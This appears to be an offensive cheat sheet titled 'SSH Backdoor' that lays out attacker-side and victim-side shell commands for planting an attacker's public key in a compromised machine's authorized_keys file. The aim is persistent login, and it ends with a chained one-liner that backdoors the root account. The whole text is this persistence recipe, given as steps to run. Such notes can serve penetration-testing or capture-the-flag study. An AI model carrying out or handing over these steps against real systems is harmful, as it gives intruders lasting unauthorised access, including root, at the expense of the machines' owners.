SSH Backdoor

• Attacker:

ssh-keygen

cat ~/.ssh/id_rsa.pub | xclip -selection c

• Victim:

copy .pub key from victim machine in ~/.ssh/authorized_keys

echo "[ctrl+shift+v]" >> /home/victim_username/.ssh/authorized_keys

Then set rigth perms:

chmod +700 ~/

chmod +700 ~/.ssh

chmod +600 ~/.ssh/authorized_keys

- Then to connect:

ssh -i {private_key} {target}@{target_ip}

- One-liner to backdoor root:

• Attacker:

cat ~/.ssh/id_rsa.pub | xclip -selection c

• Victim:

mkdir ~/.ssh && touch ~/.ssh/authorized_keys && chmod +700 ~/ && chmod +700 ~/.ssh && chmod +600 ~/.ssh/authorized_keys && echo "[ctrl+shift+v]" >> /root/.ssh/authorized_keys